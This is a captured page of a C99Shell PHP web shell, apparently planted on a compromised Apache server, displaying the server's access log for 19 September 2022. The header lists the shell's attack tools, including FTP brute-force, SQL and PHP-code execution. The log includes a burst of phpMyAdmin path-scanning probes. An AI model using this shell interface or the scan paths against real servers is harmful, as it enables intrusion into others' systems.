!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.09.19.log (2.96 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [19/Sep/2022:00:00:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:01:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:00:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:01:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
172.105.89.161 - - [19/Sep/2022:00:03:09 -0500] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 226
190.9.218.188 - - [19/Sep/2022:00:03:25 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19jKiLsJBLIU6u/v1aX3FWPmeGc4P5yv3PGsIu1DYLUPzM3Btej+a/RTYB8riF9y39dmhIhFaOddTVlp+Hdt+12urzzyaOvEtaJDP3iTu2U4h6m7aycu4TBxG9j7QIjKI5YwfaWbVtcDsKP7utrCTvoA2bKr9yq+S5px9NxN3pXvskFUEbP+JnrpLLw/pnB/pXWvhEdz4y068cywAQCQD/5KQ9c77Iv2ZxG56u22Myx9WXdWuDl7hkFz+UA4yTl0Wv+N1eP9MKq4w==&u=U2FsdGVkX19hakgjXjn57hbjdavGXMtTSli3tjylMDY=&y=U2FsdGVkX19L/TH+zgKt1pMZ6duzypJteg6aFOX3he7++q3FQvdXHQV+zTmGMUZY HTTP/1.1" 200 25
190.9.218.188 - - [19/Sep/2022:00:03:25 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19hakgjXjn57hbjdavGXMtTSli3tjylMDY=&y=U2FsdGVkX19L/TH+zgKt1pMZ6duzypJteg6aFOX3he7++q3FQvdXHQV+zTmGMUZY HTTP/1.1" 200 25
190.9.218.188 - - [19/Sep/2022:00:03:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19rINoF/CWDGDnh77SRS+1v1ZF8ZSKqB3GVbELkGAAQ7pIfhauuRxjBxLp1tmuPR7Sz51pq8JeozGYePqPY7a58m6CI9YKrdT2PHcMrLSdFZ2gYafY5hJzA9qGPCTrWgrk2N+J1++26e+Sr2gpZr6x5WxG/78W8lwQ=&u=U2FsdGVkX19hakgjXjn57hbjdavGXMtTSli3tjylMDY=&y=U2FsdGVkX19L/TH+zgKt1pMZ6duzypJteg6aFOX3he7++q3FQvdXHQV+zTmGMUZY HTTP/1.1" 200 25
190.9.218.188 - - [19/Sep/2022:00:03:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+IKI2X7jk+e5FyeoY3jsJ3oOOyL9hxaTr0su89JQhABmGFw8pa1wt5YBd2CG6/xHB/T2CiYfO7sTC0fDTe+7jNLGgglCzOCAz3Br9zXK2HtW2vlO40rbhi8+L/0JEqu4CqCOyVb8HXK7pHs/3BQ2NCz08Ewn2EL8E=&u=U2FsdGVkX19hakgjXjn57hbjdavGXMtTSli3tjylMDY=&y=U2FsdGVkX19L/TH+zgKt1pMZ6duzypJteg6aFOX3he7++q3FQvdXHQV+zTmGMUZY HTTP/1.1" 200 25
190.9.218.188 - - [19/Sep/2022:00:03:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18PuZWh2APJ1l023W8+JOj+kWWGYtznDqqsOiDrsOZgV1FgOA4rPW7KQuZm4P2RYhr1+wTg326M35mdkMwGrI0DUvU16zBEhKX8LbncPu1uqkFLjuxDkDhRMWjwYm2aWTd+5i4NjL3dtpMFjijrAh/aUiCh1a841gY=&u=U2FsdGVkX19hakgjXjn57hbjdavGXMtTSli3tjylMDY=&y=U2FsdGVkX19L/TH+zgKt1pMZ6duzypJteg6aFOX3he7++q3FQvdXHQV+zTmGMUZY HTTP/1.1" 200 25
190.9.218.188 - - [19/Sep/2022:00:03:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19oytqndggsUIR8cGzrTzJjkyDCJVvfyrXEIexJt/RerUIpkgTexX4kCZu+2MJEzMlWeJ3RNjEFljpEpm6RNX7rz3y9VdkRR0DXdri+ITE8b50T/hi/3Zo5ZghyPV+IdpTJRnyTVA5/pN3pUlyANyMluzxLQptNozW7fiNia98zItcEK1hbTYEl&u=U2FsdGVkX19hakgjXjn57hbjdavGXMtTSli3tjylMDY=&y=U2FsdGVkX19L/TH+zgKt1pMZ6duzypJteg6aFOX3he7++q3FQvdXHQV+zTmGMUZY HTTP/1.1" 200 25
172.22.2.4 - - [19/Sep/2022:00:03:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63207
216.245.221.92 - - [19/Sep/2022:00:05:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:06:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:07:12 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [19/Sep/2022:00:07:21 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [19/Sep/2022:00:06:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.62.197.2 - - [19/Sep/2022:00:08:14 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:00:07:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
190.156.185.197 - - [19/Sep/2022:00:10:31 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
157.55.39.202 - - [19/Sep/2022:00:10:36 -0500] "GET /bla/resoluciones/resoluciones%202010/3073.pdf HTTP/1.1" 200 434127
190.156.185.197 - - [19/Sep/2022:00:10:37 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394468
216.245.221.92 - - [19/Sep/2022:00:10:38 -0500] "HEAD / HTTP/1.1" 200 -
64.62.197.3 - - [19/Sep/2022:00:11:04 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.156.185.197 - - [19/Sep/2022:00:11:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/5795.pdf HTTP/1.1" 200 352473
201.245.192.253 - - [19/Sep/2022:00:11:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:12:45 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Sep/2022:00:12:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [19/Sep/2022:00:14:13 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:00:12:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [19/Sep/2022:00:15:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:16:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [19/Sep/2022:00:16:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
103.156.50.161 - - [19/Sep/2022:00:17:20 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:00:16:16 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 59319
172.22.2.4 - - [19/Sep/2022:00:17:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
172.22.2.4 - - [19/Sep/2022:00:17:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:19:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41994
201.245.192.253 - - [19/Sep/2022:00:19:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42441
152.61.128.50 - - [19/Sep/2022:00:19:49 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:00:18:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
216.245.221.92 - - [19/Sep/2022:00:20:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:21:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
184.73.99.196 - - [19/Sep/2022:00:21:59 -0500] "GET /galeria/galeria/fotos/1humedal-Burro1P.jpg HTTP/1.1" 200 7921
172.22.2.4 - - [19/Sep/2022:00:23:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Sep/2022:00:25:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:24:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [19/Sep/2022:00:26:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [19/Sep/2022:00:29:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41994
201.245.192.253 - - [19/Sep/2022:00:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42441
216.245.221.92 - - [19/Sep/2022:00:30:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:29:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:31:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:30:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
80.94.92.231 - - [19/Sep/2022:00:33:13 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [19/Sep/2022:00:34:53 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [19/Sep/2022:00:34:54 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1230
172.22.2.4 - - [19/Sep/2022:00:35:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve=ambiental HTTP/1.1" 200 826768
172.22.2.4 - - [19/Sep/2022:00:35:15 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [19/Sep/2022:00:35:15 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:35:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve=ambiental HTTP/1.1" 200 826768
216.245.221.92 - - [19/Sep/2022:00:35:38 -0500] "HEAD / HTTP/1.1" 200 -
191.88.177.1 - - [19/Sep/2022:00:36:03 -0500] "GET /BLA/resoluciones/AUTOS%202022/5692.pdf HTTP/1.1" 200 291647
191.88.177.1 - - [19/Sep/2022:00:36:03 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.88.177.1 - - [19/Sep/2022:00:36:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/5456.pdf HTTP/1.1" 200 389237
201.245.192.253 - - [19/Sep/2022:00:36:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:35:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:36:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
201.245.192.253 - - [19/Sep/2022:00:39:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41994
201.245.192.253 - - [19/Sep/2022:00:39:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42441
216.245.221.92 - - [19/Sep/2022:00:40:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:41:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:41:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.88.177.1 - - [19/Sep/2022:00:43:00 -0500] "GET /BLA/resoluciones/AUTOS%202022/4835.pdf HTTP/1.1" 200 371500
172.22.2.4 - - [19/Sep/2022:00:42:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
216.245.221.92 - - [19/Sep/2022:00:45:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:46:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [19/Sep/2022:00:47:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:47:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [19/Sep/2022:00:50:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Sep/2022:00:51:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.131 - - [19/Sep/2022:00:53:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201500-1549.tif HTTP/1.1" 200 4831289
162.142.125.219 - - [19/Sep/2022:00:53:50 -0500] "GET / HTTP/1.1" 200 319
162.142.125.219 - - [19/Sep/2022:00:53:50 -0500] "GET / HTTP/1.1" 200 319
162.142.125.219 - - [19/Sep/2022:00:53:50 -0500] "PRI * HTTP/2.0" 400 946
162.142.125.219 - - [19/Sep/2022:00:53:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [19/Sep/2022:00:52:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:53:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50799
216.245.221.92 - - [19/Sep/2022:00:55:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Sep/2022:00:54:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
201.245.192.253 - - [19/Sep/2022:00:56:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
152.61.192.232 - - [19/Sep/2022:00:59:49 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [19/Sep/2022:00:59:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [19/Sep/2022:00:59:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [19/Sep/2022:00:58:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Sep/2022:01:00:38 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.60 - - [19/Sep/2022:01:01:15 -0500] "-" 408 -
172.22.2.4 - - [19/Sep/2022:00:59:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [19/Sep/2022:01:01:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
173.249.46.215 - - [19/Sep/2022:01:03:04 -0500] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:04 -0500] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:04 -0500] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:04 -0500] "GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:04 -0500] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:05 -0500] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:05 -0500] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:05 -0500] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:05 -0500] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:05 -0500] "GET /admin/pma/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:06 -0500] "GET /admin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:06 -0500] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:06 -0500] "GET /1phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:06 -0500] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:06 -0500] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:06 -0500] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:07 -0500] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:07 -0500] "GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:07 -0500] "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:07 -0500] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 1018
173.249.46.215 - - [19/Sep/2022:01:03:07 -0500] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 403 1165
173.249.46.215 - - [19/Sep/2022:01:03:08 -0500] "GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1" 403 1165
